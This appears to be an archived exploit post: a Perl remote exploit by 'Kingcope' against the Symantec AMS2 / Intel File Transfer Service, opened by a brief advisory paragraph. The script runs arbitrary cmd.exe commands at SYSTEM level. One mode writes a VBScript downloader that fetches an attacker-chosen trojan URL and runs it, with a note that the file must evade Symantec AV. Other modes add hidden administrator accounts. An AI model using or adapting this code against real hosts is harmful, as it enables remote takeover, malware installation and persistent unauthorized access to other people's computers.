symantec-exec.txt
Posted on 04 February 2010
#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input. #Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition. # # # # # # # # # # # # # # # # # # # # # # # # # ### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE ### REMOTE SYSTEM LEVEL EXPLOIT ### USE AT YOUR OWN RISK! ### by Kingcope in 2009 # # # # # # # # # # # # # # # # # # # # # # # # # use IO::Socket; sub rce { ($target, $cmmd) = @_; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '12174', Proto => 'tcp') || goto lbl; $magic = sprintf("%d", 0xc0d3b4b3); $command = "cmd.exe /C $cmmd | exit $magic"; $cmd = "$command"; $req = "x00x00x00x00" . pack("v", length($cmd)+1) . $cmd . "x00"; print $sock $req; read($sock, $res, 0x14); $resp = substr($res, 0x10, 4); if ($resp eq pack("L", 0xc0d3b4b3)) { print "SUCCESS! "; } else { print "COMMAND FAILED "; } return; lbl: print "PORT CLOSED "; exit; } sub usage { print "usage: perl xpl.pl [-a <target> <username> <password>] [-a2 <target> <username> <password> <administrators groupname> [-d <target> <trojan url>] [-t <target> ] "; print "-a IS ADDUSER WITH SID METHOD "; print "-a2 IS ADDUSER BY NAME "; print "-t IS TEST "; print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AV "; print "Example: perl xpl.pl -a www.symantec.com r00t p455 "; exit; } print " *** Symantec AV Remote Exploit *** by Kingcope in 2009 "; if ($#ARGV < 1) { usage(); } $specify = $ARGV[0]; $target = $ARGV[1]; if ($specify eq "-d" && $#ARGV != 2) { usage(); } if ($specify eq "-a" && $#ARGV != 3) { usage(); } if ($specify eq "-a2" && $#ARGV != 4) { usage(); } if ($specify eq "-t" && $#ARGV != 1) { usage(); } $|=1; if ($specify eq "-d") { $trojanurl = $ARGV[2]; $getcred[0] = "echo Function SaveBinaryData(FileName, ByteArray) > c:\getcreds.vbs"; $getcred[1] = "echo Const adTypeBinary = 1 >> c:\getcreds.vbs"; $getcred[2] = "echo Const adSaveCreateOverWrite = 2 >> c:\getcreds.vbs"; $getcred[3] = "echo Dim BinaryStream >> c:\getcreds.vbs"; $getcred[4] = "echo Set BinaryStream = CreateObject("ADODB.Stream") >> c:\getcreds.vbs"; $getcred[5] = "echo BinaryStream.Type = adTypeBinary >> c:\getcreds.vbs"; $getcred[6] = "echo BinaryStream.Open >> c:\getcreds.vbs"; $getcred[7] = "echo BinaryStream.Write ByteArray >> c:\getcreds.vbs"; $getcred[8] = "echo BinaryStream.SaveToFile FileName, adSaveCreateOverWrite >> c:\getcreds.vbs"; $getcred[9] = "echo End Function >> c:\getcreds.vbs"; $getcred[10] = "echo Sub HTTPDownload( myURL, myPath ) >> c:\getcreds.vbs"; $getcred[11] = "echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> c:\getcreds.vbs"; $getcred[12] = "echo objHTTP.Open "GET", myURL, False >> c:\getcreds.vbs"; $getcred[13] = "echo objHTTP.Send >> c:\getcreds.vbs"; $getcred[14] = "echo SaveBinaryData myPath, objHTTP.ResponseBody >> c:\getcreds.vbs"; $getcred[15] = "echo End Sub >> c:\getcreds.vbs"; $getcred[16] = "echo HTTPDownload "$trojanurl", "c:\installer.exe" >> c:\getcreds.vbs"; $getcred[17] = "echo Set shell = CreateObject("WScript.Shell") >> c:\getcreds.vbs"; $getcred[18] = "echo Set objEnv = shell.Environment("Process") >> c:\getcreds.vbs"; $getcred[19] = "echo Set objEnv2 = shell.Environment("User") >> c:\getcreds.vbs"; $getcred[20] = "echo Set objEnv3 = shell.Environment("System") >> c:\getcreds.vbs"; $getcred[21] = "echo sysRoot = objEnv("systemroot") >> c:\getcreds.vbs"; $getcred[22] = "echo userProfile = objEnv("userprofile") >> c:\getcreds.vbs"; $getcred[23] = "echo objEnv2("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs"; $getcred[24] = "echo objEnv3("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs"; $getcred[25] = "echo objEnv2("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs"; $getcred[26] = "echo objEnv2("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs"; $getcred[27] = "echo objEnv3("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs"; $getcred[28] = "echo objEnv3("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs"; $getcred[29] = "echo shell.CurrentDirectory = "c:\" >> c:\getcreds.vbs"; $getcred[30] = "echo shell.Run Chr(34) ^& "c:\installer.exe" ^& Chr(34), 1, false >> c:\getcreds.vbs"; $getcred[31] = "echo Set shell = Nothing >> c:\getcreds.vbs"; $commandx = $getcred[0]; for ($k=1;$k<=31;$k++) { $commandx .= " && ".$getcred[$k]; } print "UPLOAD AND RUN KIT .. "; rce($target, "$commandx && c:\getcreds.vbs"); sleep(3); print " "; print "DELETE KIT FETCHER .. "; rce($target, "del c:\getcreds.vbs"); print "COMPLETED...."; } if ($specify eq "-a") { $getcreds[0] = "echo strComputer = "." > c:\getcred.vbs"; $getcreds[1] = "echo strSID = "S-1-5-32-544" >> c:\getcred.vbs"; $getcreds[2] = "echo Set objWMIService = GetObject("winmgmts:\\" ^& strComputer ^& "\root\cimv2") >> c:\getcred.vbs"; $getcreds[3] = "echo Set objSID = objWMIService.Get("Win32_SID='" ^& strSID ^& "'") >> c:\getcred.vbs"; $getcreds[4] = "echo groupname=objSID.AccountName >> c:\getcred.vbs"; $getcreds[5] = "echo Set objNetwork = WScript.CreateObject("WScript.Network") >> c:\getcred.vbs"; $getcreds[6] = "echo Set objGroup = GetObject("WinNT://" ^& objNetwork.ComputerName ^& "/"^&groupname^&",group") >> c:\getcred.vbs"; $getcreds[7] = "echo Admin_Name = WScript.Arguments(0) >> c:\getcred.vbs"; $getcreds[8] = "echo Path = "WinNT://" ^& objNetwork.ComputerName ^& "/" ^& Admin_Name >> c:\getcred.vbs"; $getcreds[9] = "echo If Not objGroup.IsMember(Path) Then >> c:\getcred.vbs"; $getcreds[10] = "echo objGroup.Add(Path) >> c:\getcred.vbs"; $getcreds[11] = "echo End If >> c:\getcred.vbs"; $getcreds[12] = "echo Set objGroup = Nothing >> c:\getcred.vbs"; $getcreds[13] = "echo set objNetwork = Nothing >> c:\getcred.vbs"; $username = $ARGV[2]; $password = $ARGV[3]; $commandxx = $getcreds[0]; for ($k=1;$k<=13;$k++) { $commandxx .= " && " . $getcreds[$k]; } print "RUN ADD USER .. "; rce($target, "net user $username $password /add"); sleep(3); print " "; print "RUN ADD TO GROUP .. "; rce($target, "$commandxx && c:\getcred.vbs $username && del c:\getcred.vbs"); } if ($specify eq "-a2") { $username = $ARGV[2]; $password = $ARGV[3]; $admin = $ARGV[4]; print "RUN ADD USER .. "; rce($target, "net user $username $password /add && net localgroup $admin $username /add"); } if ($specify eq "-t") { print "RUN TEST $target .. "; rce($target, "echo ELITE ."); }
